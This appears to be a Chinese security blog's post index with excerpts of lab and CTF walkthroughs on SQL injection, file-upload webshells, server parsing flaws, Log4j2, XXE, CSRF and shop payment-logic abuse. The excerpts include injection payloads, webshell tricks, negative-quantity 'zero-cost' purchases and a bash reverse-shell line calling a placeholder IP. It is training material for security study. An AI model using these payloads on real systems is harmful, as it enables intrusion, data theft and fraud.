- 博客(36)
- 收藏
- 关注
RSS订阅原创 常见的框架漏洞
其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success 里面的数字是ascii码。进入 config.do 文件进行设置,将目录设置为 ws_utc 应用的静态文件css目录,访问这个目录是无需权限的,这⼀点很重要。也就是说 shell.asp;用PUT上传文档,但不能直接上传方法脚本文档,可以先上传⼀个其他类型的文档,然后移动成脚本文档。
2025-01-05 21:23:13
1987
原创 常见的中间件漏洞
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执行任意代码执行。此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到 jmx控制台,并在其中执行任何功能。制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。
2025-01-01 23:24:49
2231
原创 DriftingBlues: 6靶机
我们找一下功能点,在 content 中 files 找到了可以上传文件的地方。发现一个 zip 文件,我们在浏览器中访问它下载到本地,发现它需要密码。访问之前获取到的文件 /textpattern/textpattern。以及一段提示信息(希望我们在扫描目录的字典中加入.zip的扩展名)工具将压缩文件的密码转换为hash格式输出到 1.txt 文件中。我们获得了一个/textpattern/textpattern。我们查看一下写出的 1.txt 文件。我们使用御剑扫描一下网站的后台。
2024-12-29 23:50:29
233
原创 常见的CMS漏洞
将数据包中的slideTextStatus 字段的值修改为我们的一句话木马。写到了/config/AspCms_Config.asp 这个文件里。猜测绝对路径为E:/phpStudy/PHPTutorial/我们访问 aspcms_config.asp 文件。解压后打开第一个文件夹写入一句话木马。点击到幻灯片设置里点击保存,然后抓包。重新压缩为一个.zip压缩包。选中我们刚才重新压缩好的文件。新建-->变量-->过滤。然后再去sql语句那写入。先去下载一个免费模板。在去查看一下确保开启。
2024-12-29 23:49:38
2431
原创 Empire Lupin One靶机
在使用ssh的私钥登录服务器时,需要输入密钥解开私钥才能进行登录.上述两步操作就是通过爆破私钥获取密钥方便后续登录.. 步骤如下。我们查看到 robots.txt 文档中有~myfiles 文档,这时我们猜测他会不会还有其他的文档带有~这时我们得到了一个 icex64,并且知道了这个目录下还有文件我们爆破一下。文件里面全是编码过的数据,分析一下发现是 base58 编码,我们去解码。3 .通过john程序爆破ssh私钥的对应密码本获取ssh私钥的密码。找到了一个 secret ,我们去访问一下。
2024-12-28 16:56:21
970
原创 jangow-01-1.0.1靶机
把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali是NAT模式,在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个,按回车。继续选择第二个,这次按 e 进入编辑页面接下来, 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"按 F10 或者 ctrl+x 启动我们 cd 到 etc 下的 network 目录中修改 interfaces 文件(将网卡信息设置为 ens33),重启靶机即可生效。
2024-12-26 20:20:01
301
原创 dami网站支付漏洞
发现有两个订单,我们查看订单第一个订单价格是-5400,管理会当成垃圾文件处理。我们再查看另一个账单,实付金额为 5400,就会当成订单处理。账户余额变成 5400,这时我们再次购买这次的数量为一。这时我们就可以不花钱购物了,这时我们到管理员后台查看。用户名为 sis2410 密码为 sis2410。这时我们就可以通过他的支付漏洞进行 0 元购物。将商品数量改为-1 我们继续购买。我们前往个人中心查看余额。随便找个商品购买一下。
2024-12-26 18:59:15
203
原创 CmsEasy网站支付漏洞
发现有两个订单,我们查看订单第一个订单实付是零,管理会当成垃圾文件处理。用户名为 sis2410 密码为 sis2410。们再查看另一个账单,实付金额为 1150,就会当成订单处理。账户余额变成 2300,这时我们再次购买这次的数量为一。这时我们就可以不花钱购物了,这时我们到管理员后台查看。这时我们就可以通过他的支付漏洞进行 0 元购物。将商品数量改为-1 我们继续购买。我们随便找个商品购买一下。我们前往个人中心查看余额。
2024-12-26 18:52:23
499
原创 Matrix-Breakout 2 Morpheus靶场
这个工具扫出来了好几个目录和文件,我们访问一下graffiti.txt,graffiti.php 这两个文件。发现我们输入的数据是 123456 生成的文件为 graffiti.txt。发现 123456 在页面中显示出来了,我们再去访问 txt 文件。到目前为止我们没有找到任何有用的信息,我们尝试使用其他的工具。我们修改成我们的一句话木马,生成一个 123.php 文件。获取到 shell,我们找到了一个 flag 文件。我们放行,然后到网站中访问一下。我们在访问一下 php 文件。
2024-12-25 19:23:02
1078
原创 ctfhub disable_functions关卡
1.CTFHub Bypass disable_function —— LD_PRELOAD2.CTFHub Bypass disable_function —— ShellShock3.CTFHub Bypass disable_function —— Apache Mod CGI4.CTFHub Bypass disable_function —— 攻击PHP-FPM
2024-12-25 09:03:48
187
原创 Log4j2漏洞
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的 版本号。bash -i >& /dev/tcp/[IP]/[端口] 0>&1。-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。#需要用到一个工具JNDI-Injection-Exploit。#反弹shell-base64加密。去监听端口的页面成功反弹Shell。#新建终端并开启服务器监听。
2024-12-24 20:21:56
673
原创 niushop开源商城靶场漏洞
我们查看后台寻找功能点发现有一个地方可以执行 sql 命令。后台-->设置-->基础设置-->商城第三方统计代码。右键图片在网页新建打开图片标签;admin管理员在已登录的状态点击我们的链接。发现没有回显,这时我们可以考虑使用外带注入。得到数据库的名字为 niushop_b2c。#一句话(不想麻烦的选择一句话也可以)在BP中进行抓包,改为1.php。去蚁剑连接生成的h.php就行。我们输入一个 sql 语句。在放行一次修改数量为-1。#生成h.php文件。通过改变数量改变价格。后面全部放行就OK了。
2024-12-23 19:41:31
721
原创 IIS解析漏洞
在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是。shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx。在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码。在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。单独创建一个1.jpg发现并不能解析。在a.asp下被解析。
2024-12-22 22:21:48
242
原创 Apache解析漏洞(apache_parsing&CVE-2017-15715)
然后我们在后 yjh.php 后面加上空格,再将十六进制中的 20 修改为 0a。上传被拦截,显示是一个坏文件,我们使用 bp 抓包。发现访问失败,这时我们在文件后面加上%0a 再访问。发现木马运行成功,接下来使用蚁剑连接我们的图片马。我们写一个 一句话木马文件 名字为 1.jpg。我们写一个木马 1.php.jpg。访问成功,接下来使用蚁剑连接木马。我们还是到浏览器中访问网站。会得到我们上传文件的路径。获取 shell 成功。上传成功,我们访问一下。我们将写好的木马上传。我们在网站中上传一下。
2024-12-22 22:15:39
368
原创 Nginx解析漏洞(nginx_parsing&CVE-2013-454)
这个木马的效果是访问成功后会自动在目录中生成一个 shell.php 文件,内容为<?我们将数据包的网址改为我们要访问的 2.jpg 两个空格.php 继续到十六进制中改 20 为 00。然后我们再 jpg 后面加上两个空格再给上.php,再将十六进制中的第二个 20 修改为 00。我们访问不到,这时我们 bp 是抓不到 2.jpg 这个静态页面的,因为它没有交互。我们访问到了,但是虽然说木马上传成功但是我们这样是没有办法使用蚁剑连接的。这是我们访问一下 shell.php,查看有没有生成成功。
2024-12-22 22:08:47
290
原创 upload-labs靶场1-19关
可以看到,这里对后缀为.asp .aspx .php .jsp都进行了拒绝,并且对文件中的特殊字符进行了很多的过滤,使用了很多名单的方式进行了校验,那么我们就可以上传一些没有限制的后缀,这里我们使用 php3 后缀名。点击第一关,我们可以看到页面上传区可以上传一个图片,我们要上传一个 webshell,这里我们上传一句话木马的 php。由于会删除我们上传的文件,我们可以一直爆破上传并访问上传的1.php文件来生成webshell.php文件。我们可以在文件尾部加上点空格点(. .)就可以成功上传。
2024-12-19 20:54:48
950
原创 XXE靶场
发现有变化,这时我们构建 palody,使用 php 协议访问admin.php。我们看到右边的 msg 中出现了一串编码,我们使用 base64 编码解码。我们看到 xxe 目录下有登录框,输入账号密码后我们使用 bp 抓包。我们可以看到有两个目录/xxe/*,/admin.php。我们得到了一个/etc/.flag.php,我们读取一下。第一步我们看到网站有登录框我们试着用 bp 去抓一下包。显示输入了正确的密码这里是 flag,我们点击一下。得到密码为 admin@123,我们去登陆一下。
2024-12-18 20:13:30
695
原创 csrf客户端请求伪造
将攻击者的修改请求给受害者lili(lili信息被修改)进入点击受害链接 localhost/333.html。管理员被修改密码原来root错误被强制退出。将CSRF HTML代码放入网站根目录下。抓攻击者allen的post请求修改包。输入密码123456登录正常!攻击者vince的修改请求。受害者访问这个html。受害者kobe原本信息。现在lili正常登录。管理员admin登录。
2024-12-16 23:03:09
386
原创 sql第(18~20)关
我们再次查看源码将我们要写的代码替换掉 uagent 发现我们在后面加上 and ' 就可以使 sql 语句执行成功,这时我们再到 bp 中继续爆破。我们在页面中的账号密码框中输入 admin ,然后打开 bp 开始抓包 ,我们抓点击登录按钮后的页面。然后我们 CTRL+R 将抓到的内容发入重放器,然后我们打开重放器,点击发送,在右面打开页面渲染。这时我们输入注释符发现还是报错,这时我们去查看靶场源码,找到我们插入代码的地方。我们发现页面报错了这时我们还是使用报错注入来获取数据库的名字。
2024-12-13 21:40:02
624
原创 sql第(11~15)关
使用内置表爆破users的字段名 ') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' #使用联合查询爆破数据库的名字 ')and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +看到security中有四个表我们要查看的表为users。
2024-12-07 22:49:39
1265
原创 MSSQL靶场 第一关
'referers')--+ //返回结果为空,说明不知道第五张表。'and exists(select count(*)from sysobjects)--+ //回显正常。id=1'group by 字段名1,字段名2 having 1=1--+id=1'group by 字段名1 having 1=1--+id=1'--+ //回显正常。
2024-12-05 22:56:02
631
原创 墨者在线靶场
id=-1 union select 'null','null' from dual // -dual是Oracle数据库中的伪表。id=-1 union select 'null',null,null,null //⽆回显。id=-1 union select null,'null',null,null //有回显。id=-1 union select null,null,'null',null //有回显。id=-1 union select null,null,null,'null' //⽆回显。
2024-12-05 22:36:31
1244
原创 sql第(6~10)关
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))=117,sleep(4),0)--+ //第⼀位。
2024-12-05 22:08:34
590
原创 AI_web靶场(通关攻略)
我们发现如果用绝对路径获取是没有权限的,我们继续尝试在绝对路径上加入我们之前获取到的目录/m3diNf0/、 /se3reTdir777/uploads/查看他们有权限吗这时我们发现/m3diNf0/这个目录也没有权限,我们接着尝试/se3reTdir777/uploads/发现创建成功这时我们就获得了他的控制权免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
2024-12-04 21:03:34
733
原创 sql第(2~5)关
id=1') order by 3 --+正常。id=1') order by 4 --+异常。id=1") order by 4 --+异常。id=1' order by 4--+异常。id=1') and 1=1 --+正常。id=1') and 1=2 --+异常。id=1") and 1=1 --+正常。id=1") and 1=2 --+异常。id=1' and 1=1 --+正常。id=1 and 1=1 --+正常。id=1 and 1=2 --+异常。id=1' and 1=2--+异常。
2024-12-03 22:58:28
682
原创 sql注入第一关
'and 1=1 --+ // 1=1的时候为真,页面显示正常;-1' union select 1,database(),3 --+ //从上图得,2和3有回显位置,在2的位置查询数据库名。-1' union select 1,2,3 --+ //前面查出存在3列,所以select 3列。即select 1,2,3。order by 1 --+ 页面正常 我们把参数一个一个往上加 2,3,4,5........得到表名 emails,referers,usgents,users。
2024-12-03 22:06:10
1127
原创 CMS相关-源码泄露
Git是⼀个开源的分布式版本控制系统,在执⾏git init初始化⽬录的时候,会在当前⽬录下⾃动创建⼀个 .git⽬录,⽤来记录代码的变更记录等。CVS是⼀个C/S系统,多个开发⼈员通过⼀个中⼼版本控制系统来记录⽂件版本,从⽽达到保证⽂件同步的⽬的。swp即swap⽂件,在编辑⽂件时产⽣的临时⽂件,它是隐藏⽂件,如果程序正常退出,临时⽂件⾃动删除,如果意外退出就会保留,⽂件名为 .filename.swp。http://url/CVS/Root 返回根信息 http://url/CVS/Entries。
2024-12-02 02:47:46
458
原创 CMS相关-CMS识别
通过自动化扫描,EHole可以对各种服务器和应用程序进行深度检查,从而提高整体的安全防御能力。1)其可以检测目标网站的cms基本类型,CMSmap默认自带一个WordPress,Joomla和Drupal插件列表,所以其也可以检测目标网站的插件种类;5)CMSmap的核心是检测插件漏洞,其主要是通过查询数据库漏洞网站(www.exploit-db.com)提供了潜在的漏洞列表。CMS其实是⼀个很⼴泛的称呼,从⼀般的博客程序,2)Cmsmap是一个多线程的扫描工具,默认线程数为5;地址需带上协议,每⾏⼀个。
2024-11-28 23:01:20
590
原创 》》》⼦域名挖掘《《《 (工具)
拥有简洁的界面、简单的操作模式,支持服务接口、暴力搜索、同服挖掘三种模式,支持打开网站、复制域名、复制IP、复制CDN、导出域名、导出IP、导出域名+IP、导出域名+IP+WEB服务器以及导出存活网站。如果我们在进行渗透测试的时候,无法直接对主站点进行渗透测试,就可以尝试对该主站点的子域名进行渗透测试,从而找到突破口,拿到一定权限后再次对主站进行测试。子域名(Subdomain Name),凡顶级域名前加前缀的都是该顶级域名的子域名,而子域名根据技术的多少分为二级子域名,三级子域名以及多级子域名。
2024-11-28 22:28:10
447
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人